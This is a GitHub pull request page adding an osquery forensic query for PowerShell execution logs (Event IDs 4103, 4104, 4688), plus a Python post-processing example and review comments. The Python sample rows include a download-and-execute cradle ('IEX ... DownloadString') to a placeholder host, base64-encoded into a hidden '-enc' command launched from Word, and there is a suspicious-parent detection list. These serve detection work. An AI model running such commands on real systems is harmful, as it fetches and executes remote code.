@tomsonpl (Contributor)

PowerShell History Artifact

The PowerShell History artifact provides comprehensive forensic visibility into PowerShell execution activity by capturing module logging (Event ID 4103), script block logging (Event ID 4104), and process creation with command line auditing (Event ID 4688). This multi-layered approach enables detection of obfuscated commands, full script execution analysis, and parent/child process relationship tracking for fileless malware investigations.

Core Forensic Artifacts Coverage

# | Artifact | OS | Query | File | Description
1 | PowerShell History | Windows | powershell_history_windows_elastic | a1b2c3d4 | Comprehensive PowerShell forensic monitoring capturing module logging, script block logging, and process creation events

Queries by Platform


🪟 Windows - PowerShell Execution & Fileless Malware Detection

Description

Comprehensive PowerShell forensic monitoring query that captures three critical event types from Windows Event Logs to detect suspicious PowerShell activity and fileless malware execution. The query correlates module logging (Event ID 4103) for obfuscated command detection, script block logging (Event ID 4104) for full script content analysis, and process creation events (Event ID 4688) for command line auditing and process relationship tracking. This multi-layered approach provides complete visibility into PowerShell-based attacks aligned with MITRE ATT&CK technique T1059.001.

Detection Focus:

  • Obfuscated PowerShell commands through module logging context analysis
  • Full script execution content via script block logging capture
  • Command line parameters and encoded commands through process creation auditing
  • Parent/child process relationships for detecting PowerShell spawned from suspicious processes
  • Fileless malware execution patterns and in-memory script execution
  • Script block IDs for tracking multi-part PowerShell script execution
  • PowerShell provider activity and context information for attack chain analysis

Result

[Screenshot of query results, taken 2025-11-21 14:49]

Query results provide three distinct data sets:

  • Event ID 4103: Provider name, context information, and payload data showing obfuscated command execution
  • Event ID 4104: Script block IDs, full script text, and script paths revealing complete PowerShell code execution
  • Event ID 4688: Command line arguments, process names, and parent process names for process creation correlation

This comprehensive approach enables security analysts to reconstruct complete PowerShell attack chains, from initial execution to payload delivery.

Platform

windows

Interval

300 seconds (5 minutes)

Query ID

powershell_history_windows_elastic

ECS Field Mappings

ECS field | Query column
  • event.created | datetime
  • event.code | eventid
  • event.provider | provider_name
  • log.level | level
  • host.name | computer_name
  • process.pid | pid
  • process.thread.id | tid
  • event.action | task
  • powershell.provider.name | ProviderName
  • powershell.context_info | ContextInfo
  • powershell.payload | Payload
  • powershell.file.script_block_id | ScriptBlockId
  • powershell.file.script_block_text | ScriptBlockText
  • file.path | ScriptPath
  • process.command_line | CommandLine
  • process.name | ProcessName
  • process.parent.name | ParentProcessName

SQL Query

-- Comprehensive PowerShell Forensic Monitoring Query
-- Captures Event IDs 4103 (Module Logging), 4104 (Script Block Logging), 4688 (Process Creation)
-- Source: windows_eventlog table - Windows Event Logs (Historical)
-- Focus: Fileless malware detection, obfuscated command tracking, command line auditing
-- MITRE ATT&CK: T1059.001 (PowerShell)
-- Last updated: 2025-11-21

-- Query PowerShell Operational logs for Event IDs 4103 and 4104
SELECT
    datetime,
    eventid,
    provider_name,
    level,
    task,
    computer_name,
    channel,
    pid,
    tid,
    data,
    -- Event ID 4103: Module Logging - Extract obfuscated command context
    CASE
        WHEN eventid = 4103 THEN json_extract(data, '$.EventData.ProviderName')
        ELSE NULL
    END AS ProviderName,
    CASE
        WHEN eventid = 4103 THEN json_extract(data, '$.EventData.ContextInfo')
        ELSE NULL
    END AS ContextInfo,
    CASE
        WHEN eventid = 4103 THEN json_extract(data, '$.EventData.Payload')
        ELSE NULL
    END AS Payload,
    -- Event ID 4104: Script Block Logging - Extract full script content
    CASE
        WHEN eventid = 4104 THEN json_extract(data, '$.EventData.ScriptBlockId')
        ELSE NULL
    END AS ScriptBlockId,
    CASE
        WHEN eventid = 4104 THEN json_extract(data, '$.EventData.ScriptBlockText')
        ELSE NULL
    END AS ScriptBlockText,
    CASE
        WHEN eventid = 4104 THEN json_extract(data, '$.EventData.Path')
        ELSE NULL
    END AS ScriptPath,
    NULL AS CommandLine,
    NULL AS ProcessName,
    NULL AS ParentProcessName
FROM windows_eventlog
WHERE
    channel = 'Microsoft-Windows-PowerShell/Operational'
    AND eventid IN (4103, 4104)
UNION ALL
-- Query Security logs for Event ID 4688 (Process Creation)
SELECT
    datetime,
    eventid,
    provider_name,
    level,
    task,
    computer_name,
    channel,
    pid,
    tid,
    data,
    NULL AS ProviderName,
    NULL AS ContextInfo,
    NULL AS Payload,
    NULL AS ScriptBlockId,
    NULL AS ScriptBlockText,
    NULL AS ScriptPath,
    -- Event ID 4688: Process Creation - Extract command line and process hierarchy
    json_extract(data, '$.EventData.CommandLine') AS CommandLine,
    json_extract(data, '$.EventData.NewProcessName') AS ProcessName,
    json_extract(data, '$.EventData.ParentProcessName') AS ParentProcessName
FROM windows_eventlog
WHERE
    channel = 'Security'
    AND eventid = 4688
    AND data LIKE '%powershell%'
ORDER BY datetime DESC;

This PR was AI-assisted by Claude Code

@tomsonpl added the labels documentation (Improvements or additions to documentation. Applied to PRs that modify *.md files.) and Integration:osquery_manager (Osquery Manager) on Nov 21, 2025
@tomsonpl marked this pull request as ready for review on November 21, 2025 at 14:11
@tomsonpl requested a review from a team as a code owner on November 21, 2025 at 14:11
@tomsonpl requested reviews from joeypoon and pzl on November 21, 2025 at 14:11
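A post-processing step for the three row types the query above returns, as an added example that is not part of this PR or of the osquery_manager integration. It assumes the query output is available as dictionaries with the windows_eventlog columns eventid, channel and data (the event JSON with an EventData object), and it does three things the raw rows do not: it reassembles 4104 fragments that share a ScriptBlockId in MessageNumber order and marks blocks whose fragments are missing, it decodes -EncodedCommand (and its -e/-ec/-enc abbreviations) from 4688 command lines, and it parses the "Key = Value" lines of a 4103 ContextInfo field and flags PowerShell spawned by Office or script hosts. The sample rows, BLOCK_ID, the URLs and the SUSPICIOUS_PARENTS list are constructed for illustration.

```python
"""Post-process rows from the PowerShell History osquery query.

Added example for this page, not code from the PR or the integration.
Assumes rows carry the windows_eventlog columns eventid, channel and data,
where data is the event JSON with an "EventData" object. All rows below
are constructed samples.
"""
import base64
import json
import re
from collections import defaultdict

# --- constructed sample rows (shape modelled on osquery's windows_eventlog) ---
PLAIN_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"
ENCODED_CMD = base64.b64encode(PLAIN_CMD.encode("utf-16-le")).decode("ascii")
BLOCK_ID = "0a1b2c3d-0000-4000-8000-000000000001"  # assumed ScriptBlockId
PS_CHANNEL = "Microsoft-Windows-PowerShell/Operational"


def _row(eventid, channel, event_data):
    return {"eventid": eventid, "channel": channel,
            "data": json.dumps({"EventData": event_data})}


SAMPLE_ROWS = [
    # A long script block is logged as several 4104 events with one ScriptBlockId;
    # they may be returned in any order, MessageNumber/MessageTotal order them.
    _row(4104, PS_CHANNEL, {"ScriptBlockId": BLOCK_ID, "MessageNumber": "2",
                            "MessageTotal": "2", "Path": "",
                            "ScriptBlockText": "Invoke-Expression $p"}),
    _row(4104, PS_CHANNEL, {"ScriptBlockId": BLOCK_ID, "MessageNumber": "1",
                            "MessageTotal": "2", "Path": "",
                            "ScriptBlockText": "$p = (New-Object Net.WebClient)"
                                               ".DownloadString('http://example.invalid/a');"}),
    _row(4103, PS_CHANNEL, {"ContextInfo": "        Severity = Informational\r\n"
                                           "        Host Name = ConsoleHost\r\n"
                                           "        Command Name = Invoke-Expression\r\n"
                                           "        User = LAB\\alice",
                            "Payload": 'CommandInvocation(Invoke-Expression): "Invoke-Expression"'}),
    _row(4688, "Security", {"NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                            "ParentProcessName": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                            "CommandLine": "powershell.exe -NoP -W Hidden -enc " + ENCODED_CMD}),
]

# Constructed list of parents from which an interactive PowerShell is rarely legitimate.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
# -e, -ec, -en, -enc, ... are accepted abbreviations of -EncodedCommand;
# -ex / -exec belong to -ExecutionPolicy and must not match.
_ENC_RE = re.compile(r"(?<!\S)-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def event_data(row):
    return json.loads(row["data"]).get("EventData", {})


def reassemble_script_blocks(rows):
    """Join 4104 fragments per ScriptBlockId in MessageNumber order.
    Returns {ScriptBlockId: {"text": str, "complete": bool, "path": str}}."""
    parts, total, path = defaultdict(dict), {}, {}
    for row in rows:
        if row["eventid"] != 4104:
            continue
        ed = event_data(row)
        bid = ed["ScriptBlockId"]
        parts[bid][int(ed.get("MessageNumber", 1))] = ed.get("ScriptBlockText", "")
        total[bid] = int(ed.get("MessageTotal", 1))
        path[bid] = ed.get("Path", "")
    return {bid: {"text": "".join(frag[n] for n in sorted(frag)),
                  "complete": len(frag) == total[bid], "path": path[bid]}
            for bid, frag in parts.items()}


def decode_encoded_command(command_line):
    """Return the plaintext of an -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = _ENC_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_context_info(text):
    """4103 ContextInfo is a block of 'Key = Value' lines; return it as a dict."""
    out = {}
    for line in text.splitlines():
        key, sep, value = line.partition(" = ")
        if sep:
            out[key.strip()] = value.strip()
    return out


def analyze(rows):
    """Correlate the three row types into one findings structure."""
    findings = {"blocks": reassemble_script_blocks(rows), "process": [], "modules": []}
    for row in rows:
        ed = event_data(row)
        if row["eventid"] == 4688:
            parent = ed.get("ParentProcessName", "").rsplit("\\", 1)[-1].lower()
            findings["process"].append({"parent": parent,
                                        "suspicious_parent": parent in SUSPICIOUS_PARENTS,
                                        "decoded": decode_encoded_command(ed.get("CommandLine", ""))})
        elif row["eventid"] == 4103:
            findings["modules"].append(parse_context_info(ed.get("ContextInfo", "")))
    return findings


if __name__ == "__main__":
    print(json.dumps(analyze(SAMPLE_ROWS), indent=2))
```

Run as-is to see the reassembled script, the decoded command and the parent-process flag for the sample rows; in practice the rows come from the query output, and an incomplete block (complete is False) means the 300-second interval split a multi-part script across two collection runs, so the fragments should be merged across runs by ScriptBlockId rather than examined per run.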
@elasticmachine

💚 Build Succeeded

@tomsonpl tomsonpl changed the base branch from main to temporary-osquery-artifacts-branch November 21, 2025 16:27
@raqueltabuyo

What is the difference from the powershell_events table? I am not sure if the data retrieved from this query will be parsed properly and if the whole PowerShell block is reconstructed to show the full content. https://osquery.io/schema/5.20.0/#powershell_events

@andrewkroh added the label Team:Defend Workflows (Security team for Endpoint and OSQuery workflows [elastic/security-defend-workflows]) on Nov 25, 2025